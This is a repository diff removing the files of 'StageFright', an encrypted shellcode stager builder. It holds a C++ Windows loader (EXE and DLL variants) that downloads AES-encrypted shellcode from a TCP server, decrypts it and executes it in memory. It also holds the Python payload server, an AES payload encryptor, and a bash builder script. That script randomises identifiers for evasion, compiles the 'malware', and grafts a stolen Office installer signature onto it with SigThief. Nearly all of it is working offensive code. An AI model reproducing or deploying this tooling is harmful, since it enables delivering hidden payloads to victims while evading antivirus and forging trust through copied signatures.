-int Random3(char* Random4, unsigned int Random5, char* Random6, size_t Random6len) {
-    HCRYPTPROV hProv;
-    HCRYPTHASH hHash;
-    HCRYPTKEY hKey;
-
-    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
-        return -1;
-    }
-    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
-        return -1;
-    }
-    if (!CryptHashData(hHash, (BYTE*)Random6, (DWORD)Random6len, 0)) {
-        return -1;
-    }
-    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
-        return -1;
-    }
-
-    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &Random5)) {
-        return -1;
-    }
-
-    CryptReleaseContext(hProv, 0);
-    CryptDestroyHash(hHash);
-    CryptDestroyKey(hKey);
-
-    return 0;
-}
-
-char Random7[] = KEYVALUE
-
-extern "C" void CALLBACK ENTRYPOINT(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
-    LPCWSTR szServer = L"HOSTNAME";
-    LPCWSTR szFilePath = L"SHAREFOLDER\\SHELLCODEFILE";
-
-    PBYTE Random8;
-    SIZE_T Random8Size;
-
-    BOOL success = Random1(szServer, szFilePath, &Random8, &Random8Size);
-
-    if (success) {
-        Random3((char*)Random8, Random8Size, Random7, sizeof(Random7));
-
-        success = Random2(Random8, Random8Size);
-
-        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
-        SIZE_T regionSize = Random8Size;
-        NTSTATUS status = pNtFreeVirtualMemory(
-            GetCurrentProcess(),
-            (PVOID*)&Random8,
-            &regionSize,
-            MEM_RELEASE);
-
-        LocalFree(Random8);
-    }
-
-    return success ? 0 : 1;
-}
-

+ 0 - 26
StageFright/StageFright/StageFright/TCP/Resources/aesencrypt.py

@@ -1,26 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with AES
-# 
-# author: reenz0h (twitter: @SEKTOR7net)
-
-import sys
-from base64 import b64encode
-from Crypto.Cipher import AES
-from Crypto.Util.Padding import pad
-from Crypto.Random import get_random_bytes
-import hashlib
-
-KEY = get_random_bytes(16)
-iv = 16 * b'\x00'
-cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
-
-try:
-    plaintext = open(sys.argv[1], "rb").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
-
-print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
-print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

Разница между файлами не показана из-за своего большого размера
+ 0 - 0
StageFright/StageFright/StageFright/TCP/Resources/con.py


+ 0 - 188
StageFright/StageFright/StageFright/TCP/Resources/template.cpp

@@ -1,188 +0,0 @@
-#include <winsock2.h>
-#include <ws2tcpip.h>
-#include <windows.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#pragma comment (lib, "crypt32.lib")
-#pragma comment (lib, "advapi32")
-#include <psapi.h>
-
-// Define the shellcode function signature
-typedef void (*zhCAcpCedgP)();
-
-bool kGOSfrjfhwzM(const char* TEInSsEqj, int yzdLOvSDmh, const char* Random4, char*& lfgRp, size_t& kIVqYdu) {
-    WSADATA wsaData;
-    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
-        printf("Failed to initialize Winsock.\n");
-        return false;
-    }
-
-    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
-    if (clientSocket == INVALID_SOCKET) {
-        perror("Error creating socket");
-        WSACleanup();
-        return false;
-    }
-
-    sockaddr_in serverAddress{};
-    serverAddress.sin_family = AF_INET;
-    serverAddress.sin_port = htons(yzdLOvSDmh);
-    serverAddress.sin_addr.s_addr = inet_addr(TEInSsEqj);
-
-    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
-        perror("Invalid address/Address not supported");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
-        perror("Connection failed");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    // Send the length of the file path first
-    size_t Random4Len = strlen(Random4);
-    printf("Sending file path length: %zu\n", Random4Len);
-    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
-
-    // Send the file path to the server
-    printf("Sending file path: %s\n", Random4);
-    send(clientSocket, Random4, Random4Len, 0);
-
-    int fileSize;
-int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
-if (bytesRead != sizeof(fileSize)) {
-    printf("Error receiving file size: %d\n", WSAGetLastError());
-    closesocket(clientSocket);
-    WSACleanup();
-    return false;
-}
-
-fileSize = ntohl(fileSize); // Convert from network byte order to host byte order
-
-printf("Received file size: %d\n", fileSize);
-    // Receive and save the binary data in a dynamically allocated buffer
-    lfgRp = new char[fileSize];
-    if (lfgRp == nullptr) {
-        printf("Error allocating memory for binary data.\n");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    size_t totalSize = 0;
-    while (totalSize < fileSize) {
-        bytesRead = recv(clientSocket, lfgRp + totalSize, fileSize - totalSize, 0);
-        if (bytesRead <= 0) {
-            printf("Error receiving binary data: %d\n", WSAGetLastError());
-            delete[] lfgRp;
-            closesocket(clientSocket);
-            WSACleanup();
-            return false;
-        }
-        totalSize += bytesRead;
-    }
-
-    // Close the socket
-    closesocket(clientSocket);
-
-    kIVqYdu = totalSize;
-    printf("Received data size: %zu\n", kIVqYdu);
-
-    return true;
-}
-
-int bVfdOlkjkxVS(char * DrKmsFdBXfMxR, unsigned int DrKmsFdBXfMxR_len, char * DLhQUbzLsS, size_t DLhQUbzLsSlen) {
-        HCRYPTPROV hProv;
-        HCRYPTHASH hHash;
-        HCRYPTKEY hKey;
-
-        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
-                return -1;
-        }
-        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
-                return -1;
-        }
-        if (!CryptHashData(hHash, (BYTE*)DLhQUbzLsS, (DWORD)DLhQUbzLsSlen, 0)){
-                return -1;              
-        }
-        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
-                return -1;
-        }
-        
-        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, DrKmsFdBXfMxR, &DrKmsFdBXfMxR_len)){
-                return -1;
-        }
-        
-        CryptReleaseContext(hProv, 0);
-        CryptDestroyHash(hHash);
-        CryptDestroyKey(hKey);
-        
-        return 0;
-}
-
-
-
-char DLhQUbzLsS []=  { 0xf1, 0x9c, 0xad, 0x3a, 0x41, 0x79, 0xfb, 0x9f, 0xb, 0xb5, 0x3, 0xd7, 0x18, 0x82, 0xdd, 0x64 };
-
-int main() {
-    const char* TEInSsEqj = "192.168.1.12";  // Replace with the actual server IP
-    int yzdLOvSDmh = 8080;               // Replace with the actual server port
-    const char* Random4 = "invoice.txt";  // Replace with the actual file path on the server
-
-    char* lfgRp;
-    size_t kIVqYdu;
-
-    if (kGOSfrjfhwzM(TEInSsEqj, yzdLOvSDmh, Random4, lfgRp, kIVqYdu)) {
-        printf("Binary data received successfully.\n");
-
-        // Print received data size for debugging
-        printf("Received data size: %zu\n", kIVqYdu);
-        
-        bVfdOlkjkxVS((char *) lfgRp, kIVqYdu, DLhQUbzLsS, sizeof(DLhQUbzLsS));
-
-        // Allocate executable memory with READ, WRITE permissions
-        LPVOID executableMemory = VirtualAlloc(NULL, kIVqYdu, MEM_COMMIT, PAGE_READWRITE);
-        if (executableMemory == NULL) {
-            DWORD error = GetLastError();
-            printf("Error allocating executable memory: %d\n", error);
-            delete[] lfgRp;
-            return 1;
-        }
-
-        // Copy binary data to the executable memory
-        memcpy(executableMemory, lfgRp, kIVqYdu);
-        
-        // Change the protection to PAGE_EXECUTE_READ
-        DWORD oldProtect;
-        if (!VirtualProtect(executableMemory, kIVqYdu, PAGE_EXECUTE_READ, &oldProtect)) {
-            DWORD error = GetLastError();
-            printf("Error changing memory protection: %d\n", error);
-            VirtualFree(executableMemory, 0, MEM_RELEASE);
-            delete[] lfgRp;
-            return 1;
-        }
-
-        // Create a function pointer to the shellcode
-        zhCAcpCedgP lbagLzOZD = reinterpret_cast<zhCAcpCedgP>(executableMemory);
-
-        // Call the shellcode function
-        printf("Executing shellcode...\n");
-        lbagLzOZD();
-
-        // No freeing of allocated memory in this POC
-
-        printf("Shellcode executed successfully.\n");
-    } else {
-        printf("Failed to receive binary data.\n");
-        return 1;
-    }
-
-    return 0;
-}
-

+ 0 - 189
StageFright/StageFright/StageFright/TCP/TCP.sh

@@ -1,189 +0,0 @@
-#!/bin/bash
-
-# Color variables
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-cat << "EOF"
-  ___   _____ _____   _____                            _           _ 
- / _ \ |  ___/  ___| |  ___|                          | |         | |
-/ /_\ \| |__ \ `--.  | |__ _ __   ___ _ __ _   _ _ __ | |_ ___  __| |
-|  _  ||  __| `--. \ |  __| '_ \ / __| '__| | | | '_ \| __/ _ \/ _` |
-| | | || |___/\__/ / | |__| | | | (__| |  | |_| | |_) | ||  __/ (_| |
-\_| |_/\____/\____/  \____/_| |_|\___|_|   \__, | .__/ \__\___|\__,_|
-                                            __/ | |                  
-                                           |___/|_|                  
- _____ _                       _   _____ _____ ______                
-/  ___| |                     | | |_   _/  __ \| ___ \               
-\ `--.| |_ __ _  __ _  ___  __| |   | | | /  \/| |_/ /               
- `--. \ __/ _` |/ _` |/ _ \/ _` |   | | | |    |  __/                
-/\__/ / || (_| | (_| |  __/ (_| |   | | | \__/\| |                   
-\____/ \__\__,_|\__, |\___|\__,_|   \_/  \____/\_|                   
-                 __/ |                                               
-                |___/                                                
- _____                    _   _                                      
-|  ___|                  | | (_)                                     
-| |____  _____  ___ _   _| |_ _  ___  _ __                           
-|  __\ \/ / _ \/ __| | | | __| |/ _ \| '_ \                          
-| |___>  <  __/ (__| |_| | |_| | (_) | | | |                         
-\____/_/\_\___|\___|\__,_|\__|_|\___/|_| |_|                        
-
-EOF
-
-echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
-echo ""
-read Shellcode
-echo ""
-echo -e ${green}"What's Your Server IP?"${clear}
-echo ""
-read HOSTNAME
-echo ""
-echo -e ${green}"Enter Your Port"${clear}
-echo ""
-read PORTY
-echo ""
-echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
-echo ""
-read SHELLCODEFILE
-echo ""
-echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
-echo ""
-read MALWARE
-echo ""
-cp StageFright/TCP/template.cpp StageFright/TCP/Resources/template.cpp
-echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
-echo ""
-sleep 2
-python3 StageFright/TCP/Resources/aesencrypt.py $Shellcode > shell.txt
-echo -e ${yellow}"***Encryption Completed***"${clear}
-echo ""
-cp shell.txt shell2.txt
-
-#Generate AES Key
-keys=$(cat "shell2.txt")
-cut -d 'p' -f1 shell2.txt > shell3.txt
-keys=$(cat shell3.txt)
-keysnow=${keys#*=}
-sed -i "s/KEYVALUE/$keysnow/g" StageFright/TCP/Resources/template.cpp
-
-#Generate AES Payload
-payload=$(cat "shell.txt")
-payloadnow=${payload#*;}
-payloadtoday=${payloadnow#*=}
-echo $payloadtoday > shell5.txt
-cp StageFright/TCP/conv.py StageFright/TCP/Resources/con.py
-perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/TCP/Resources/con.py
-sed -i "s/{/[/g" -i StageFright/TCP/Resources/con.py
-sed -i "s/}/]/g" -i StageFright/TCP/Resources/con.py
-sed -i "s/;//g" -i StageFright/TCP/Resources/con.py
-python3 StageFright/TCP/Resources/con.py
-#rm StageFright/TCP/Resources/con.py
-mv payload.bin $SHELLCODEFILE
-sleep 2
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomE=$(cat shell.txt)
-sed -i "s/RandomE/$RandomE/g" StageFright/TCP/Resources/template.cpp
-
-
-#Replace IP, PORT and SHELLCODEFILE
-sed -i "s/PORTY/$PORTY/g" StageFright/TCP/Resources/template.cpp
-sed -i "s/HOSTNAME/$HOSTNAME/g" StageFright/TCP/Resources/template.cpp
-sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/TCP/Resources/template.cpp
-#Replacing Values
-
-# Get Payload From URL Function
-
-#FindShare
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-Random1=$(cat shell.txt)
-sed -i "s/Random1/$Random1/g" StageFright/TCP/Resources/template.cpp
-
-#pPayloadBytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-Random2=$(cat shell.txt)
-sed -i "s/Random2/$Random2/g" StageFright/TCP/Resources/template.cpp
-
-#sPayloadSize
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random3=$(cat shell.txt)
-sed -i "s/Random3/$Random3/g" StageFright/TCP/Resources/template.cpp
-
-#bSTATE
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
-Random5=$(cat shell.txt)
-sed -i "s/Random5/$Random5/g" StageFright/TCP/Resources/template.cpp
-
-#sSize
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
-Random6=$(cat shell.txt)
-sed -i "s/Random6/$Random6/g" StageFright/TCP/Resources/template.cpp
-
-#hInternet
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-Random7=$(cat shell.txt)
-sed -i "s/Random7/$Random7/g" StageFright/TCP/Resources/template.cpp
-
-#dwBytesRead
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
-Random8=$(cat shell.txt)
-sed -i "s/Random8/$Random8/g" StageFright/TCP/Resources/template.cpp
-
-#pBytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random9=$(cat shell.txt)
-sed -i "s/Random9/$Random9/g" StageFright/TCP/Resources/template.cpp
-
-#PAYLOAD
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomA=$(cat shell.txt)
-sed -i "s/RandomA/$RandomA/g" StageFright/TCP/Resources/template.cpp
-
-#Sleep Function
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-RandomJ=$(cat shell.txt)
-sed -i "s/RandomJ/$RandomJ/g" StageFright/TCP/Resources/template.cpp
-
-#AES KEY NAME
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-RandomK=$(cat shell.txt)
-sed -i "s/RandomK/$RandomK/g" StageFright/TCP/Resources/template.cpp
-
-# Main Function
-
-#Bytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-RandomB=$(cat shell.txt)
-sed -i "s/RandomB/$RandomB/g" StageFright/TCP/Resources/template.cpp
-
-#Size
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomC=$(cat shell.txt)
-sed -i "s/RandomC/$RandomC/g" StageFright/TCP/Resources/template.cpp
-
-#Compile
-
-echo -e ${yellow}"+++Compiling Malware+++"${clear}
-x86_64-w64-mingw32-g++ -o $MALWARE StageFright/TCP/Resources/template.cpp -static-libgcc -static-libstdc++ -lws2_32 -lole32 -lwbemuuid -O2 -Wno-narrowing -fpermissive >/dev/null 2>&1
-echo ""
-sleep 2
-rm shell*
-echo -e ${yellow}"***Malware Compiled***"${clear}
-echo ""
-sleep 2
-echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
-echo ""
-sleep 2
-python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
-mv signed$MALWARE $MALWARE
-echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
-echo ""
-echo -e ${yellow}"***Edit And Run The TCP Server***"${clear}
-
-

+ 0 - 4
StageFright/StageFright/StageFright/TCP/conv.py

@@ -1,4 +0,0 @@
-buf=PAYVAL 
-payload = bytes(bytearray(buf))
-with open('payload.bin', 'wb') as f:
-    f.write(payload)

+ 0 - 69
StageFright/StageFright/StageFright/TCP/tcp_server.py

@@ -1,69 +0,0 @@
-import socketserver
-import os
-
-class MyHandler(socketserver.BaseRequestHandler):
-    def handle(self):
-        print("Connection received from:", self.client_address)
-
-        try:
-            # Receive file path length
-            path_len_bytes = self.request.recv(8)
-            if not path_len_bytes:
-                print("Error receiving file path length.")
-                return
-
-            path_len = int.from_bytes(path_len_bytes, byteorder='little')  # Change byte order to 'little'
-            print(f"Received file path length: {path_len}")
-
-            # Receive file path
-            file_path_bytes = b""
-            while len(file_path_bytes) < path_len:
-                received_data = self.request.recv(path_len - len(file_path_bytes))
-                if not received_data:
-                    print("Error receiving file path.")
-                    return
-                file_path_bytes += received_data
-
-            file_name = file_path_bytes.decode('utf-8')
-            print("Received file name:", file_name)
-
-            # Check if the file exists
-            file_path = os.path.join(os.getcwd(), file_name)
-            print("Absolute file path:", file_path)
-            if os.path.exists(file_path):
-                print("File found:", file_path)
-
-                # Read file data
-                with open(file_path, 'rb') as file:
-                    file_data = file.read()
-
-                # Print the size before sending
-                file_size = len(file_data)
-                print("Size of file:", file_size)
-
-                # Send file size to the client
-                self.request.sendall(file_size.to_bytes(4, byteorder='big'))
-
-                # Send file data back to the client
-                self.request.sendall(file_data)
-                print("File data sent successfully.")
-
-            else:
-                print("File not found:", file_path)
-                self.request.sendall(b"FILE_NOT_FOUND")
-
-        except Exception as e:
-            print("Error:", str(e))
-            self.request.sendall(b"SERVER_ERROR")
-
-if __name__ == "__main__":
-    host, port = "192.168.1.12", 8080
-    server = socketserver.TCPServer((host, port), MyHandler)
-    print(f"Server listening on {host}:{port}")
-
-    try:
-        server.serve_forever()
-    except KeyboardInterrupt:
-        print("Server shutting down.")
-        server.shutdown()
-

+ 0 - 188
StageFright/StageFright/StageFright/TCP/template.cpp

@@ -1,188 +0,0 @@
-#include <winsock2.h>
-#include <ws2tcpip.h>
-#include <windows.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#pragma comment (lib, "crypt32.lib")
-#pragma comment (lib, "advapi32")
-#include <psapi.h>
-
-// Define the shellcode function signature
-typedef void (*RandomA)();
-
-bool Random1(const char* Random2, int Random3, const char* Random4, char*& Random5, size_t& Random6) {
-    WSADATA wsaData;
-    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
-        printf("Failed to initialize Winsock.\n");
-        return false;
-    }
-
-    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
-    if (clientSocket == INVALID_SOCKET) {
-        perror("Error creating socket");
-        WSACleanup();
-        return false;
-    }
-
-    sockaddr_in serverAddress{};
-    serverAddress.sin_family = AF_INET;
-    serverAddress.sin_port = htons(Random3);
-    serverAddress.sin_addr.s_addr = inet_addr(Random2);
-
-    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
-        perror("Invalid address/Address not supported");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
-        perror("Connection failed");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    // Send the length of the file path first
-    size_t Random4Len = strlen(Random4);
-    printf("Sending file path length: %zu\n", Random4Len);
-    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
-
-    // Send the file path to the server
-    printf("Sending file path: %s\n", Random4);
-    send(clientSocket, Random4, Random4Len, 0);
-
-    int fileSize;
-int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
-if (bytesRead != sizeof(fileSize)) {
-    printf("Error receiving file size: %d\n", WSAGetLastError());
-    closesocket(clientSocket);
-    WSACleanup();
-    return false;
-}
-
-fileSize = ntohl(fileSize); // Convert from network byte order to host byte order
-
-printf("Received file size: %d\n", fileSize);
-    // Receive and save the binary data in a dynamically allocated buffer
-    Random5 = new char[fileSize];
-    if (Random5 == nullptr) {
-        printf("Error allocating memory for binary data.\n");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    size_t totalSize = 0;
-    while (totalSize < fileSize) {
-        bytesRead = recv(clientSocket, Random5 + totalSize, fileSize - totalSize, 0);
-        if (bytesRead <= 0) {
-            printf("Error receiving binary data: %d\n", WSAGetLastError());
-            delete[] Random5;
-            closesocket(clientSocket);
-            WSACleanup();
-            return false;
-        }
-        totalSize += bytesRead;
-    }
-
-    // Close the socket
-    closesocket(clientSocket);
-
-    Random6 = totalSize;
-    printf("Received data size: %zu\n", Random6);
-
-    return true;
-}
-
-int Random7(char * Random8, unsigned int Random8_len, char * Random9, size_t Random9len) {
-        HCRYPTPROV hProv;
-        HCRYPTHASH hHash;
-        HCRYPTKEY hKey;
-
-        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
-                return -1;
-        }
-        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
-                return -1;
-        }
-        if (!CryptHashData(hHash, (BYTE*)Random9, (DWORD)Random9len, 0)){
-                return -1;              
-        }
-        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
-                return -1;
-        }
-        
-        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, Random8, &Random8_len)){
-                return -1;
-        }
-        
-        CryptReleaseContext(hProv, 0);
-        CryptDestroyHash(hHash);
-        CryptDestroyKey(hKey);
-        
-        return 0;
-}
-
-
-
-char Random9 []= KEYVALUE
-
-int main() {
-    const char* Random2 = "HOSTNAME";  // Replace with the actual server IP
-    int Random3 = PORTY;               // Replace with the actual server port
-    const char* Random4 = "SHELLCODEFILE";  // Replace with the actual file path on the server
-
-    char* Random5;
-    size_t Random6;
-
-    if (Random1(Random2, Random3, Random4, Random5, Random6)) {
-        printf("Binary data received successfully.\n");
-
-        // Print received data size for debugging
-        printf("Received data size: %zu\n", Random6);
-        
-        Random7((char *) Random5, Random6, Random9, sizeof(Random9));
-
-        // Allocate executable memory with READ, WRITE permissions
-        LPVOID executableMemory = VirtualAlloc(NULL, Random6, MEM_COMMIT, PAGE_READWRITE);
-        if (executableMemory == NULL) {
-            DWORD error = GetLastError();
-            printf("Error allocating executable memory: %d\n", error);
-            delete[] Random5;
-            return 1;
-        }
-
-        // Copy binary data to the executable memory
-        memcpy(executableMemory, Random5, Random6);
-        
-        // Change the protection to PAGE_EXECUTE_READ
-        DWORD oldProtect;
-        if (!VirtualProtect(executableMemory, Random6, PAGE_EXECUTE_READ, &oldProtect)) {
-            DWORD error = GetLastError();
-            printf("Error changing memory protection: %d\n", error);
-            VirtualFree(executableMemory, 0, MEM_RELEASE);
-            delete[] Random5;
-            return 1;
-        }
-
-        // Create a function pointer to the shellcode
-        RandomA RandomB = reinterpret_cast<RandomA>(executableMemory);
-
-        // Call the shellcode function
-        printf("Executing shellcode...\n");
-        RandomB();
-
-        // No freeing of allocated memory in this POC
-
-        printf("Shellcode executed successfully.\n");
-    } else {
-        printf("Failed to receive binary data.\n");
-        return 1;
-    }
-
-    return 0;
-}
-

+ 0 - 26
StageFright/StageFright/StageFright/TCPDLL/Resources/aesencrypt.py

@@ -1,26 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with AES
-# 
-# author: reenz0h (twitter: @SEKTOR7net)
-
-import sys
-from base64 import b64encode
-from Crypto.Cipher import AES
-from Crypto.Util.Padding import pad
-from Crypto.Random import get_random_bytes
-import hashlib
-
-KEY = get_random_bytes(16)
-iv = 16 * b'\x00'
-cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
-
-try:
-    plaintext = open(sys.argv[1], "rb").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
-
-print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
-print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

Разница между файлами не показана из-за своего большого размера
+ 0 - 0
StageFright/StageFright/StageFright/TCPDLL/Resources/con.py


BIN
StageFright/StageFright/StageFright/TCPDLL/Resources/malware.dll


+ 0 - 188
StageFright/StageFright/StageFright/TCPDLL/Resources/template.cpp

@@ -1,188 +0,0 @@
-#include <winsock2.h>
-#include <ws2tcpip.h>
-#include <windows.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#pragma comment(lib, "crypt32.lib")
-#pragma comment(lib, "advapi32")
-#include <psapi.h>
-
-// Define the shellcode function signature
-typedef void (*HUUTjodrPVG)();
-
-bool WXEjtHeXGRaH(const char* OQmbgsGuW, int yprPDCUUPq, const char* Random4, char*& GugJH, size_t& ENUQBQQ) {
-    WSADATA wsaData;
-    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
-        printf("Failed to initialize Winsock.\n");
-        return false;
-    }
-
-    SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, 0);
-    if (clientSocket == INVALID_SOCKET) {
-        perror("Error creating socket");
-        WSACleanup();
-        return false;
-    }
-
-    sockaddr_in serverAddress{};
-    serverAddress.sin_family = AF_INET;
-    serverAddress.sin_port = htons(yprPDCUUPq);
-    serverAddress.sin_addr.s_addr = inet_addr(OQmbgsGuW);
-
-    if (serverAddress.sin_addr.s_addr == INADDR_NONE) {
-        perror("Invalid address/Address not supported");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    if (connect(clientSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress)) < 0) {
-        perror("Connection failed");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    // Send the length of the file path first
-    size_t Random4Len = strlen(Random4);
-    printf("Sending file path length: %zu\n", Random4Len);
-    send(clientSocket, reinterpret_cast<char*>(&Random4Len), sizeof(Random4Len), 0);
-
-    // Send the file path to the server
-    printf("Sending file path: %s\n", Random4);
-    send(clientSocket, Random4, Random4Len, 0);
-
-    int fileSize;
-    int bytesRead = recv(clientSocket, reinterpret_cast<char*>(&fileSize), sizeof(fileSize), 0);
-    if (bytesRead != sizeof(fileSize)) {
-        printf("Error receiving file size: %d\n", WSAGetLastError());
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    fileSize = ntohl(fileSize); // Convert from network byte order to host byte order
-
-    printf("Received file size: %d\n", fileSize);
-    // Receive and save the binary data in a dynamically allocated buffer
-    GugJH = new char[fileSize];
-    if (GugJH == nullptr) {
-        printf("Error allocating memory for binary data.\n");
-        closesocket(clientSocket);
-        WSACleanup();
-        return false;
-    }
-
-    size_t totalSize = 0;
-    while (totalSize < fileSize) {
-        bytesRead = recv(clientSocket, GugJH + totalSize, fileSize - totalSize, 0);
-        if (bytesRead <= 0) {
-            printf("Error receiving binary data: %d\n", WSAGetLastError());
-            delete[] GugJH;
-            closesocket(clientSocket);
-            WSACleanup();
-            return false;
-        }
-        totalSize += bytesRead;
-    }
-
-    // Close the socket
-    closesocket(clientSocket);
-
-    ENUQBQQ = totalSize;
-    printf("Received data size: %zu\n", ENUQBQQ);
-
-    return true;
-}
-
-int kaRyEcluPiEW(char* gwtamZsHddxtV, unsigned int gwtamZsHddxtV_len, char* iNjzxZyJyK, size_t iNjzxZyJyKlen) {
-    HCRYPTPROV hProv;
-    HCRYPTHASH hHash;
-    HCRYPTKEY hKey;
-
-    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
-        return -1;
-    }
-    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
-        return -1;
-    }
-    if (!CryptHashData(hHash, (BYTE*)iNjzxZyJyK, (DWORD)iNjzxZyJyKlen, 0)) {
-        return -1;
-    }
-    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
-        return -1;
-    }
-
-    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, gwtamZsHddxtV, &gwtamZsHddxtV_len)) {
-        return -1;
-    }
-
-    CryptReleaseContext(hProv, 0);
-    CryptDestroyHash(hHash);
-    CryptDestroyKey(hKey);
-
-    return 0;
-}
-
-char iNjzxZyJyK[] =  { 0x59, 0xfa, 0xe2, 0x44, 0x6c, 0xf1, 0x9e, 0xf6, 0xdf, 0xd8, 0x4e, 0x16, 0xcd, 0xf5, 0x8a, 0xf6 };;
-
-extern "C" void CALLBACK Go(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
